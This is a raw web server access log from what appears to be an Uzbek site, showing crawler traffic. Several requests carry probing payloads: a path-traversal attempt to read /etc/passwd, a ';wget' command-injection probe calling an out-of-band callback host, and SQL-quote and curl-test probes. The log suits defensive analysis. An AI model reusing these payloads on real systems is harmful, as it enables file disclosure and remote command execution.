85.208.96.208 - - [24/Aug/2026:23:17:40 +0500] "GET /uz/stockholders-uzb/kpe-uzb/6193-fixed-assets/9873-reestr-xarid-3-2024-xlsx HTTP/1.1" 200 32347 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:23:18:04 +0500] "GET /uz/component/search/?Itemid=17025&catid=2&format=opensearch&id=9729 HTTP/1.1" 200 733 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.7 - - [24/Aug/2026:23:18:32 +0500] "GET /?attributes=%7B%22__file%22%3A%22%2Fetc%2Fpasswd%22%7D&is_frontend=true&rest_route=%2Fessential-blocks%2Fv1%2Fproducts&start=54 HTTP/1.1" 200 64786 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.231 - - [24/Aug/2026:23:18:44 +0500] "GET /uz/?3x=3x&start=24 HTTP/1.1" 200 63047 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.12 - - [24/Aug/2026:23:19:15 +0500] "GET /?plot=%3Bwget%20http%3A%2F%2Fce4utud5ele8pmo00010s3w41yracacis.oast.pro&start=48 HTTP/1.1" 200 65102 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.57.162.91 - - [24/Aug/2026:23:19:35 +0500] "GET /?start=60&template=accessibility' HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
98.82.63.147 - - [24/Aug/2026:23:19:55 +0500] "GET /uz/?start=24&wptouch_switch=desktop HTTP/1.1" 200 63098 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
141.148.144.42 - - [24/Aug/2026:23:20:11 +0500] "GET /en?start=6 HTTP/1.1" 200 15418 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
216.244.66.231 - - [24/Aug/2026:23:20:12 +0500] "GET /?paytm_action=curltest HTTP/1.1" 200 63086 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
18.232.11.247 - - [24/Aug/2026:23:20:14 +0500] "GET /uz/?format=feed&type=atom&yandex-source=touch-maps HTTP/1.1" 200 12853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
141.148.144.42 - - [24/Aug/2026:23:20:15 +0500] "GET /en?start=6 HTTP/1.1" 200 15813 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:23:20:22 +0500] "GET /uz/component/search/?Itemid=17206&catid=6193&format=opensearch&id=9772 HTTP/1.1" 200 721 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:23:20:31 +0500] "GET /uz/component/search/?Itemid=17241&catid=2&format=opensearch&id=9731 HTTP/1.1" 200 733 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
